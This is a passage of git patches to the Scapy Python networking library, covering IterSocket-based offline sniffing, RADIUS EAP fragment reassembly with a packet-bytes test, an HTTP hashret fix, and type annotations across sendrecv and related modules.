i2m(self, pkt, x): class _ECBasisField(PacketField): __slots__ = ["clsdict", "basis_type_from"] - def __init__(self, name, default, basis_type_from, clsdict, remain=0): + def __init__(self, name, default, basis_type_from, clsdict): self.clsdict = clsdict self.basis_type_from = basis_type_from - PacketField.__init__(self, name, default, None, remain=remain) + PacketField.__init__(self, name, default, None) def m2i(self, pkt, m): basis = self.basis_type_from(pkt) From 73055eab97d1b768f8a7d9c8d70f618c2ec17250 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 14 Jan 2021 15:10:01 +0100 Subject: [PATCH 0484/1632] Optimize sniff's offline --- scapy/sendrecv.py | 42 ++++++++++++++++++++++------------- scapy/supersocket.py | 52 +++++++++++++++++++++++++++++++++++++++++++- scapy/utils.py | 24 +++++++------------- 3 files changed, 86 insertions(+), 32 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index acb5b3cf67a..d7251449d02 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -31,7 +31,7 @@ from scapy.modules import six from scapy.modules.six.moves import map from scapy.sessions import DefaultSession -from scapy.supersocket import SuperSocket +from scapy.supersocket import SuperSocket, IterSocket if conf.route is None: # unused import, only to initialize conf.route and conf.iface* @@ -867,30 +867,42 @@ def _run(self, if offline is not None: flt = karg.get('filter') + if isinstance(offline, str): + # Single file + offline = [offline] if isinstance(offline, list) and \ all(isinstance(elt, str) for elt in offline): + # List of files sniff_sockets.update((PcapReader( fname if flt is None else - tcpdump(fname, args=["-w", "-"], flt=flt, getfd=True) + tcpdump(fname, + args=["-w", "-"], + flt=flt, + getfd=True, + quiet=quiet) ), fname) for fname in offline) elif isinstance(offline, dict): + # Dict of files sniff_sockets.update((PcapReader( fname if flt is None else - tcpdump(fname, args=["-w", "-"], flt=flt, getfd=True) + tcpdump(fname, + args=["-w", "-"], + flt=flt, + getfd=True, + quiet=quiet) ), label) for fname, label in six.iteritems(offline)) + elif isinstance(offline, (Packet, PacketList, list)): + # Iterables (list of packets, PacketList..) + offline = IterSocket(offline) + sniff_sockets[offline if flt is None else PcapReader( + tcpdump(offline, + args=["-w", "-"], + flt=flt, + getfd=True, + quiet=quiet) + )] = offline else: - # Write Scapy Packet objects to a pcap file - def _write_to_pcap(packets_list): - filename = get_temp_file(autoext=".pcap") - wrpcap(filename, offline) - return filename, filename - - if isinstance(offline, Packet): - tempfile_written, offline = _write_to_pcap([offline]) - elif isinstance(offline, (list, PacketList)) and \ - all(isinstance(elt, Packet) for elt in offline): - tempfile_written, offline = _write_to_pcap(offline) - + # Other (file descriptors...) sniff_sockets[PcapReader( offline if flt is None else tcpdump(offline, diff --git a/scapy/supersocket.py b/scapy/supersocket.py index d9632f2be6a..75eb1022fcb 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -24,17 +24,19 @@ import scapy.modules.six as six from scapy.packet import Packet import scapy.packet -from scapy.plist import PacketList +from scapy.plist import _PacketList, PacketList, SndRcvList from scapy.utils import PcapReader, tcpdump # Typing imports from scapy.compat import ( Any, + Iterator, List, Optional, Tuple, Type, Union, + cast, ) # Utils @@ -475,3 +477,51 @@ def select(sockets, remain=None): if (WINDOWS or DARWIN): return sockets, None return SuperSocket.select(sockets, remain=remain) + + +# More abstract objects + +class IterSocket(SuperSocket): + desc = "wrapper around an iterable" + nonblocking_socket = True + + def __init__(self, obj): + # type: (Union[Packet, List[Packet], _PacketList[Packet]]) -> None + if not obj: + self.iter = iter([]) # type: Iterator[Packet] + elif isinstance(obj, IterSocket): + self.iter = obj.iter + elif isinstance(obj, SndRcvList): + def _iter(obj=cast(SndRcvList, obj)): + # type: (SndRcvList) -> Iterator[Packet] + for s, r in obj: + if s.sent_time: + s.time = s.sent_time + yield s + yield r + self.iter = _iter() + elif isinstance(obj, (list, PacketList)): + if isinstance(obj[0], bytes): # type: ignore + # Deprecated + self.iter = (conf.raw_layer(x) for x in obj) + else: + self.iter = (y for x in obj for y in x) + else: + self.iter = obj.__iter__() + + @staticmethod + def select(sockets, remain=None): + # type: (List[SuperSocket], Any) -> Tuple[List[SuperSocket], None] + return sockets, None + + def recv(self, *args): + # type: (*Any) -> Optional[Packet] + try: + pkt = next(self.iter) + return pkt.__class__(bytes(pkt)) + except StopIteration: + raise EOFError + + def close(self): + # type: () -> None + pass diff --git a/scapy/utils.py b/scapy/utils.py index b864bc1a342..a1a3fc51e99 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1635,24 +1635,14 @@ def write(self, pkt): self.write_header(pkt) self.write_packet(pkt) else: - # Import here to avoid a circular dependency - from scapy.plist import SndRcvList - if isinstance(pkt, SndRcvList): - def _iter(pkt=cast(SndRcvList, pkt)): - # type: (SndRcvList) -> Iterator[Packet] - for s, r in pkt: - if s.sent_time: - s.time = s.sent_time - yield s - yield r - pkt_iter = _iter() - else: - pkt_iter = pkt.__iter__() - for p in pkt_iter: + # Import here to avoid circular dependency + from scapy.supersocket import IterSocket + for p in IterSocket(pkt).iter: if not self.header_present: self.write_header(p) - if self.linktype != conf.l2types.get(type(p), None): + if not isinstance(p, bytes) and \ + self.linktype != conf.l2types.get(type(p), None): warning("Inconsistent linktypes detected!" " The resulting PCAP file might contain" " invalid packets." @@ -2148,9 +2138,11 @@ def tcpdump( # An error has occurred return if dump: - return b"".join( + data = b"".join( iter(lambda: proc.stdout.read(1048576), b"") # type: ignore ) + proc.terminate() + return data if getproc: return proc if getfd: From 153cff409473268f2b46dbd146ba4959eaf1f91a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 9 Jan 2021 01:08:19 +0100 Subject: [PATCH 0485/1632] Radius EAP Fragmentation (2832) --- scapy/layers/radius.py | 27 +++++++++++++++++++++++---- test/scapy/layers/radius.uts | 30 ++++++++++++++++++++++++++++++ 2 files changed, 53 insertions(+), 4 deletions(-) diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index bc1cd9a72f1..af67496975a 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -6,6 +6,10 @@ """ RADIUS (Remote Authentication Dial In User Service) + +To disable Radius-EAP defragmentation (True by default), you can use:: + + conf.contribs.setdefault("radius", {}).setdefault("auto-defrag", False) """ import struct @@ -21,7 +25,6 @@ from scapy.config import conf from scapy.error import Scapy_Exception - # https://www.iana.org/assignments/radius-types/radius-types.xhtml _radius_attribute_types = { 1: "User-Name", @@ -995,7 +998,6 @@ class RadiusAttr_NAS_Port_Type(_RadiusAttrIntEnumVal): class _EAPPacketField(PacketLenField): - """ Handles EAP-Message attribute value (the actual EAP packet). """ @@ -1016,7 +1018,6 @@ class RadiusAttr_EAP_Message(RadiusAttribute): """ Implements the "EAP-Message" attribute (RFC 3579). """ - name = "EAP-Message" match_subclass = True fields_desc = [ @@ -1026,11 +1027,29 @@ class RadiusAttr_EAP_Message(RadiusAttribute): None, "value", "B", - adjust=lambda pkt, x: len(pkt.value) + 2 + adjust=lambda pkt, x: x + 2 ), _EAPPacketField("value", "", EAP, length_from=lambda p: p.len - 2) ] + def post_dissect(self, s): + if not conf.contribs.get("radius", {}).get("auto-defrag", True): + return s + if isinstance(self.value, conf.raw_layer): + # Defragment + x = s + buf = self.value.load + while x and struct.unpack("!B", x[:1])[0] == 79: + # Let's carefully avoid the infinite loop + length = struct.unpack("!B", x[1:2])[0] + if not length: + return s + buf, x = buf + x[2:length], x[length:] + if length < 254: + self.value = EAP(buf) + return x + return s + class RadiusAttr_Vendor_Specific(RadiusAttribute): """ diff --git a/test/scapy/layers/radius.uts b/test/scapy/layers/radius.uts index abf2241abc7..325b8513ec8 100644 --- a/test/scapy/layers/radius.uts +++ b/test/scapy/layers/radius.uts @@ -206,6 +206,36 @@ r = raw(RadiusAttr_Framed_IP_Address()) p = RadiusAttr_Framed_IP_Address(r) assert p.type == 8 += Radius - fragmented EAP - GH2832 + +conf.contribs["radius"] = {} + +s = b'\x0b\x1c\x04,%[\xa5\x11\x0b\xdc\x8f\x94\xf2\xe0\x01\x8a\xacNI\x8eO\xff\x01\x97\x00\xff\r\xc0\x00\x1a\x15\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4f\x03\x00P\x12n\x14\xd1\x9f\xa8\xf3\t\xe4\xc0\x82\xd6\x07AB\xd5\xf5\x18\x12\x19\xd6\x9eX\x05A\x93jo\x9a\t:\xa9g_\xc2' + +pkt = Radius(s) +assert len(pkt.attributes) == 3 +assert pkt.attributes[0].value.tls_data == b'\0' * 244 +assert pkt.attributes[1].type == 80 +assert pkt.attributes[1].len == 18 +assert pkt.attributes[2].type == 24 +assert pkt.attributes[2].len == 18 + +conf.contribs.setdefault("radius", {})["auto-defrag"] = False +_od = conf.debug_dissector +conf.debug_dissector = False + +pkt = Radius(s) + +conf.debug_dissector = _od +assert len(pkt.attributes) == 4 +assert pkt.attributes[0].type == 79 +assert pkt.attributes[1].type == 79 +assert pkt.attributes[1].value.load == b'\0' +assert pkt.attributes[2].type == 80 +assert pkt.attributes[2].len == 18 +assert pkt.attributes[3].type == 24 +assert pkt.attributes[3].len == 18 + = RadiusAttr_User_Password r = b'\x01\x00\x00\x1c0x10x20x30x40x50\x02\x08geheim' From 2b84b0b127467ce41a6420e8a4b67b49a3d13c58 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 15 Jan 2021 14:15:57 +0100 Subject: [PATCH 0486/1632] Fix HTTP hashret --- scapy/layers/http.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index eb2bc5ae232..615a9acfb3b 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -282,8 +282,7 @@ def _get_encodings(self): return encodings def hashret(self): - # The only field both Answers and Responses have in common - return self.Http_Version + return b"HTTP1" def post_dissect(self, s): if not conf.contribs["http"]["auto_compression"]: From 904a6292bd4f4d25916a6fa494649395ac5fed80 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 25 Jan 2021 10:44:44 +0100 Subject: [PATCH 0487/1632] Remove custom __eq__ from ISOTP --- scapy/contrib/isotp.py | 4 ---- 1 file changed, 4 deletions(-) diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 906530b806c..c00b5a5dc3b 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -201,10 +201,6 @@ def defragment(can_frames, use_extended_addressing=None): return results[0] - def __eq__(self, other): - # Don't compare src, dst, exsrc and exdst. - return super(ISOTP, self).__eq__(other) - class ISOTPHeader(CAN): name = 'ISOTPHeader' From e412d2f2877dbebfb8d88d90626406960dc7a559 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 26 Jan 2021 15:08:28 +0100 Subject: [PATCH 0488/1632] Set default self.ins on BPF socket --- scapy/arch/bpf/supersocket.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 75ed4a8ade1..f92f1962d38 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -58,6 +58,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, self.iface = network_name(iface or conf.iface) # Get the BPF handle + self.ins = None (self.ins, self.dev_bpf) = get_dev_bpf() self.outs = self.ins From fdded351f3c50236a1e43194df5dd8c6dbe92084 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 15 Jan 2021 19:22:10 +0100 Subject: [PATCH 0489/1632] Core typing: sendrecv.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/base_classes.py | 16 +- scapy/compat.py | 12 +- scapy/interfaces.py | 7 +- scapy/layers/l2.py | 19 +- scapy/main.py | 2 +- scapy/packet.py | 5 +- scapy/plist.py | 58 +++-- scapy/sendrecv.py | 425 ++++++++++++++++++++++++++-------- scapy/supersocket.py | 50 ++-- scapy/utils.py | 82 ++++--- 11 files changed, 500 insertions(+), 177 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 4c1e77bf2df..101113e2fae 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -26,6 +26,7 @@ scapy/plist.py scapy/pton_ntop.py scapy/route.py scapy/route6.py +scapy/sendrecv.py scapy/sessions.py scapy/supersocket.py scapy/utils.py diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 6cf4aceea32..488d34dbcc7 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -100,6 +100,10 @@ def __iter__(self): else: yield i + def __len__(self): + # type: () -> int + return self.__iterlen__() + def __repr__(self): # type: () -> str return "" % self.values @@ -393,9 +397,7 @@ def psdump(self, filename=None, **kargs): from scapy.utils import get_temp_file, ContextManagerSubprocess canvas = self.canvas_dump(**kargs) if filename is None: - fname = cast(str, get_temp_file( - autoext=kargs.get("suffix", ".eps") - )) + fname = get_temp_file(autoext=kargs.get("suffix", ".eps")) canvas.writeEPSfile(fname) if WINDOWS and conf.prog.psreader is None: os.startfile(fname) @@ -420,9 +422,7 @@ def pdfdump(self, filename=None, **kargs): from scapy.utils import get_temp_file, ContextManagerSubprocess canvas = self.canvas_dump(**kargs) if filename is None: - fname = cast(str, get_temp_file( - autoext=kargs.get("suffix", ".pdf") - )) + fname = get_temp_file(autoext=kargs.get("suffix", ".pdf")) canvas.writePDFfile(fname) if WINDOWS and conf.prog.pdfreader is None: os.startfile(fname) @@ -447,9 +447,7 @@ def svgdump(self, filename=None, **kargs): from scapy.utils import get_temp_file, ContextManagerSubprocess canvas = self.canvas_dump(**kargs) if filename is None: - fname = cast(str, get_temp_file( - autoext=kargs.get("suffix", ".svg") - )) + fname = get_temp_file(autoext=kargs.get("suffix", ".svg")) canvas.writeSVGfile(fname) if WINDOWS and conf.prog.svgreader is None: os.startfile(fname) diff --git a/scapy/compat.py b/scapy/compat.py index 5d5fc5a375a..e9aa1f3bd43 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -27,10 +27,12 @@ 'DefaultDict', 'Dict', 'Generic', - 'Iterator', 'IO', + 'Iterator', 'List', 'Literal', + 'NamedTuple', + 'NewType', 'NoReturn', 'Optional', 'Pattern', @@ -42,6 +44,7 @@ 'TypeVar', 'Union', 'cast', + 'overload', 'FAKE_TYPING', 'TYPE_CHECKING', # compat @@ -122,6 +125,8 @@ def __repr__(self): Iterator, IO, List, + NamedTuple, + NewType, NoReturn, Optional, Pattern, @@ -133,6 +138,7 @@ def __repr__(self): TypeVar, Union, cast, + overload, ) else: # Let's be creative and make some fake ones. @@ -149,6 +155,8 @@ def cast(_type, obj): # type: ignore Iterator = _FakeType("Iterator") # type: ignore IO = _FakeType("IO") # type: ignore List = _FakeType("List", list) # type: ignore + NamedTuple = _FakeType("NamedTuple", collections.namedtuple) # type: ignore # noqa: E501 + NewType = _FakeType("NewType") NoReturn = _FakeType("NoReturn") # type: ignore Optional = _FakeType("Optional") Pattern = _FakeType("Pattern") # type: ignore @@ -163,6 +171,8 @@ def cast(_type, obj): # type: ignore class Sized(object): # type: ignore pass + overload = lambda x: x + # Python 3.8 Only if sys.version_info >= (3, 8): from typing import Literal diff --git a/scapy/interfaces.py b/scapy/interfaces.py index e0c0839eafd..aae0c55ad2b 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -188,6 +188,9 @@ def __radd__(self, other): return other + self.network_name +_GlobInterfaceType = Union[NetworkInterface, str] + + class NetworkInterfaceDict(UserDict): """Store information about network interfaces and convert between names""" @@ -384,7 +387,7 @@ def dev_from_index(if_index): def resolve_iface(dev): - # type: (Union[NetworkInterface, str]) -> NetworkInterface + # type: (_GlobInterfaceType) -> NetworkInterface """ Resolve an interface name into the interface """ @@ -410,7 +413,7 @@ def resolve_iface(dev): def network_name(dev): - # type: (Union[NetworkInterface, str]) -> str + # type: (_GlobInterfaceType) -> str """ Resolves the device network name of a device or Scapy NetworkInterface """ diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 277b81e3f78..b1224208f9d 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -53,7 +53,12 @@ ) from scapy.modules.six import viewitems from scapy.packet import bind_layers, Packet -from scapy.plist import PacketList, SndRcvList, _PacketList +from scapy.plist import ( + PacketList, + QueryAnswer, + SndRcvList, + _PacketList, +) from scapy.sendrecv import sendp, srp, srp1 from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \ mac2str, valid_mac, valid_net, valid_net6 @@ -693,7 +698,7 @@ def arpcachepoison(target, victim, interval=60): class ARPingResult(SndRcvList): def __init__(self, - res=None, # type: Optional[Union[_PacketList[Tuple[Packet, Packet]], List[Tuple[Packet, Packet]]]] # noqa: E501 + res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501 name="ARPing", # type: str stats=None # type: Optional[List[Type[Packet]]] ): @@ -726,8 +731,14 @@ def arping(net, timeout=2, cache=0, verbose=None, **kargs): Set cache=True if you want arping to modify internal ARP-Cache""" if verbose is None: verbose = conf.verb - ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=net), verbose=verbose, # noqa: E501 - filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs) # noqa: E501 + ans, unans = srp( + Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=net), + verbose=verbose, + filter="arp and arp[7] = 2", + timeout=timeout, + iface_hint=net, + **kargs + ) ans = ARPingResult(ans.res) if cache and ans is not None: diff --git a/scapy/main.py b/scapy/main.py index 39e2db9d526..b381df5e887 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -316,7 +316,7 @@ def save_session(fname="", session=None, pickleProto=-1): if not fname: fname = conf.session if not fname: - conf.session = fname = cast(str, utils.get_temp_file(keep=True)) + conf.session = fname = utils.get_temp_file(keep=True) log_interactive.info("Use [%s] as session file", fname) if not session: diff --git a/scapy/packet.py b/scapy/packet.py index 7ded839edf6..6b060d8fa0c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -41,6 +41,7 @@ from scapy.compat import raw, orb, bytes_encode from scapy.base_classes import BasePacket, Gen, SetGen, Packet_metaclass, \ _CanvasDumpExtended +from scapy.interfaces import _GlobInterfaceType from scapy.volatile import RandField, VolatileValue from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \ pretty_list, EDecimal @@ -153,7 +154,7 @@ def __init__(self, self.raw_packet_cache_fields = None # type: Optional[Dict[str, Any]] # noqa: E501 self.wirelen = None # type: Optional[int] self.direction = None # type: Optional[int] - self.sniffed_on = None # type: Optional[str] + self.sniffed_on = None # type: Optional[_GlobInterfaceType] if _pkt: self.dissect(_pkt) if not _internal: @@ -189,7 +190,7 @@ def __init__(self, Union[EDecimal, float], Optional[Union[EDecimal, float, None]], Optional[int], - Optional[str], + Optional[_GlobInterfaceType], Optional[int] ] diff --git a/scapy/plist.py b/scapy/plist.py index fdde6ffef2d..6e959f9b19d 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -15,8 +15,13 @@ from scapy.compat import lambda_tuple_converter from scapy.config import conf -from scapy.base_classes import BasePacket, BasePacketList, \ - _CanvasDumpExtended, PacketList_metaclass +from scapy.base_classes import ( + BasePacket, + BasePacketList, + PacketList_metaclass, + SetGen, + _CanvasDumpExtended, +) from scapy.utils import do_graph, hexdump, make_table, make_lined_table, \ make_tex_table, issubtype from scapy.extlib import plt, Line2D, \ @@ -34,6 +39,7 @@ Generic, Iterator, List, + NamedTuple, Optional, Tuple, Type, @@ -47,7 +53,13 @@ # Results # ############# -_Inner = TypeVar("_Inner", Packet, Tuple[Packet, Packet]) + +QueryAnswer = NamedTuple( + "QueryAnswer", + [("query", Packet), ("answer", Packet)] +) + +_Inner = TypeVar("_Inner", Packet, QueryAnswer) @six.add_metaclass(PacketList_metaclass) @@ -163,10 +175,20 @@ def __getitem__(self, item): name="mod %s" % self.listname) return self.res.__getitem__(item) - def __add__(self, other): - # type: (_PacketList[_Inner]) -> _PacketList[_Inner] - return self.__class__(self.res + other.res, - name="%s+%s" % (self.listname, other.listname)) + _T = TypeVar('_T', 'SndRcvList', 'PacketList') + + # Hinting hack: type self + def __add__(self, # type: _PacketList._T # type: ignore + other # type: _PacketList._T + ): + # type: (...) -> _PacketList._T + return self.__class__( + self.res + other.res, + name="%s+%s" % ( + self.listname, + other.listname + ) + ) def summary(self, prn=None, # type: Optional[Callable[..., Any]] @@ -768,7 +790,7 @@ def sr(self, multi=False, lookahead=None): :return: ( (matched couples), (unmatched packets) ) """ remain = self.res[:] - sr = [] # type: List[Tuple[Packet, Packet]] + sr = [] # type: List[QueryAnswer] i = 0 if lookahead is None or lookahead == 0: lookahead = len(remain) @@ -779,7 +801,7 @@ def sr(self, multi=False, lookahead=None): j += 1 r = remain[j] if r.answers(s): - sr.append((s, r)) + sr.append(QueryAnswer(s, r)) if multi: remain[i]._answered = 1 remain[j]._answered = 2 @@ -794,13 +816,21 @@ def sr(self, multi=False, lookahead=None): return SndRcvList(sr), PacketList(remain) -class SndRcvList(_PacketList[Tuple[Packet, Packet]], - BasePacketList[Tuple[Packet, Packet]], +_PacketIterable = Union[ + List[Packet], + Packet, + SetGen[Packet], + _PacketList[Packet] +] + + +class SndRcvList(_PacketList[QueryAnswer], + BasePacketList[QueryAnswer], _CanvasDumpExtended): __slots__ = [] # type: List[str] def __init__(self, - res=None, # type: Optional[Union[_PacketList[Tuple[Packet, Packet]], List[Tuple[Packet, Packet]]]] # noqa: E501 + res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501 name="Results", # type: str stats=None # type: Optional[List[Type[Packet]]] ): @@ -808,9 +838,9 @@ def __init__(self, super(SndRcvList, self).__init__(res, name, stats) def _elt2pkt(self, elt): - # type: (Tuple[Packet, Packet]) -> Packet + # type: (QueryAnswer) -> Packet return elt[1] def _elt2sum(self, elt): - # type: (Tuple[Packet, Packet]) -> str + # type: (QueryAnswer) -> str return "%s ==> %s" % (elt[0].summary(), elt[1].summary()) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index d7251449d02..24166665511 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -8,7 +8,6 @@ """ from __future__ import absolute_import, print_function -from collections import namedtuple import itertools from threading import Thread, Event import os @@ -21,18 +20,42 @@ from scapy.data import ETH_P_ALL from scapy.config import conf from scapy.error import warning -from scapy.interfaces import network_name, resolve_iface -from scapy.packet import Gen, Packet +from scapy.interfaces import ( + network_name, + resolve_iface, + NetworkInterface, +) +from scapy.packet import Packet from scapy.utils import get_temp_file, tcpdump, wrpcap, \ ContextManagerSubprocess, PcapReader -from scapy.plist import PacketList, SndRcvList +from scapy.plist import ( + PacketList, + QueryAnswer, + SndRcvList, +) from scapy.error import log_runtime, log_interactive, Scapy_Exception -from scapy.base_classes import SetGen +from scapy.base_classes import Gen, SetGen from scapy.modules import six from scapy.modules.six.moves import map from scapy.sessions import DefaultSession from scapy.supersocket import SuperSocket, IterSocket +# Typing imports +from scapy.compat import ( + Any, + Callable, + Dict, + Iterator, + List, + Optional, + Tuple, + Type, + Union, + cast +) +from scapy.interfaces import _GlobInterfaceType +from scapy.plist import _PacketIterable + if conf.route is None: # unused import, only to initialize conf.route and conf.iface* import scapy.route # noqa: F401 @@ -43,18 +66,16 @@ class debug: - recv = [] - sent = [] - match = [] - crashed_on = None + recv = PacketList([], "Received") + sent = PacketList([], "Sent") + match = SndRcvList([], "Matched") + crashed_on = None # type: Optional[Tuple[Type[Packet], bytes]] #################### # Send / Receive # #################### -QueryAnswer = namedtuple("QueryAnswer", ["query", "answer"]) - _DOC_SNDRCV_PARAMS = """ :param pks: SuperSocket instance to send/receive packets :param pkt: the packet to send @@ -72,6 +93,9 @@ class debug: """ +_GlobSessionType = Union[Type[DefaultSession], DefaultSession] + + class SndRcvHandler(object): """ Util to send/receive packets, used by sr*(). @@ -86,13 +110,22 @@ class SndRcvHandler(object): - DEVS: store the outgoing timestamp right BEFORE sending the packet to avoid races that could result in negative latency. We aren't Stadia """ - def __init__(self, pks, pkt, - timeout=None, inter=0, verbose=None, - chainCC=False, - retry=0, multi=False, rcv_pks=None, - prebuild=False, _flood=None, - threaded=False, - session=None): + def __init__(self, + pks, # type: SuperSocket + pkt, # type: _PacketIterable + timeout=None, # type: Optional[int] + inter=0, # type: int + verbose=None, # type: Optional[int] + chainCC=False, # type: bool + retry=0, # type: int + multi=False, # type: bool + rcv_pks=None, # type: Optional[SuperSocket] + prebuild=False, # type: bool + _flood=None, # type: Optional[Tuple[int, Callable[[], None]]] # noqa: E501 + threaded=False, # type: bool + session=None # type: Optional[_GlobSessionType] + ): + # type: (...) -> None # Instantiate all arguments if verbose is None: verbose = conf.verb @@ -101,7 +134,7 @@ def __init__(self, pks, pkt, debug.sent = PacketList([], "Sent") debug.match = SndRcvList([], "Matched") self.nbrecv = 0 - self.ans = [] + self.ans = [] # type: List[QueryAnswer] self.pks = pks self.rcv_pks = rcv_pks or pks self.inter = inter @@ -112,7 +145,7 @@ def __init__(self, pks, pkt, self.session = session # Instantiate packet holders if _flood: - self.tobesent = pkt + self.tobesent = pkt # type: Union[_PacketIterable, SetGen[Packet]] self.notans = _flood[0] else: if isinstance(pkt, types.GeneratorType) or prebuild: @@ -133,7 +166,7 @@ def __init__(self, pks, pkt, self.timeout = None while retry >= 0: - self.hsent = {} + self.hsent = {} # type: Dict[bytes, List[Packet]] if threaded or _flood: # Send packets in thread. @@ -193,9 +226,11 @@ def __init__(self, pks, pkt, self.unans_result = PacketList(remain, "Unanswered") def results(self): + # type: () -> Tuple[SndRcvList, PacketList] return self.ans_result, self.unans_result def _sndrcv_snd(self): + # type: () -> None """Function used in the sending thread of sndrcv()""" try: if self.verbose: @@ -218,6 +253,7 @@ def _sndrcv_snd(self): log_runtime.exception("--- Error sending packets") def _process_packet(self, r): + # type: (Packet) -> None """Internal function used to process each packet.""" if r is None: return @@ -240,7 +276,8 @@ def _process_packet(self, r): sentpkt._answered = 1 break if self.notans <= 0 and not self.multi: - self.sniffer.stop(join=False) + if self.sniffer: + self.sniffer.stop(join=False) if not ok: if self.verbose > 1: os.write(1, b".") @@ -249,15 +286,16 @@ def _process_packet(self, r): debug.recv.append(r) def _sndrcv_rcv(self, callback): + # type: (Callable[[], None]) -> None """Function used to receive packets and check their hashret""" - self.sniffer = None + self.sniffer = None # type: Optional[AsyncSniffer] try: self.sniffer = AsyncSniffer() self.sniffer._run( prn=self._process_packet, timeout=self.timeout, store=False, - opened_socket=self.pks, + opened_socket=self.rcv_pks, session=self.session, started_callback=callback ) @@ -267,6 +305,7 @@ def _sndrcv_rcv(self, callback): def sndrcv(*args, **kwargs): + # type: (*Any, **Any) -> Tuple[SndRcvList, PacketList] """Scapy raw function to send a packet and receive its answer. WARNING: This is an internal function. Using sr/srp/sr1/srp is more appropriate in many cases. @@ -275,7 +314,24 @@ def sndrcv(*args, **kwargs): return sndrcver.results() -def __gen_send(s, x, inter=0, loop=0, count=None, verbose=None, realtime=None, return_packets=False, *args, **kargs): # noqa: E501 +def __gen_send(s, # type: SuperSocket + x, # type: _PacketIterable + inter=0, # type: int + loop=0, # type: int + count=None, # type: Optional[int] + verbose=None, # type: Optional[int] + realtime=False, # type: bool + return_packets=False, # type: bool + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> Optional[PacketList] + """ + An internal function used by send/sendp to actually send the packets, + implement the send logic... + + It will take care of iterating through the different packets + """ if isinstance(x, str): x = conf.raw_layer(load=x) if not isinstance(x, Gen): @@ -316,11 +372,22 @@ def __gen_send(s, x, inter=0, loop=0, count=None, verbose=None, realtime=None, r print("\nSent %i packets." % n) if return_packets: return sent_packets - - -def _send(x, _func, inter=0, loop=0, iface=None, count=None, - verbose=None, realtime=None, - return_packets=False, socket=None, **kargs): + return None + + +def _send(x, # type: _PacketIterable + _func, # type: Callable[[NetworkInterface], Type[SuperSocket]] + inter=0, # type: int + loop=0, # type: int + iface=None, # type: Optional[_GlobInterfaceType] + count=None, # type: Optional[int] + verbose=None, # type: Optional[int] + realtime=False, # type: bool + return_packets=False, # type: bool + socket=None, # type: Optional[SuperSocket] + **kargs # type: Any + ): + # type: (...) -> Optional[PacketList] """Internal function used by send and sendp""" need_closing = socket is None iface = 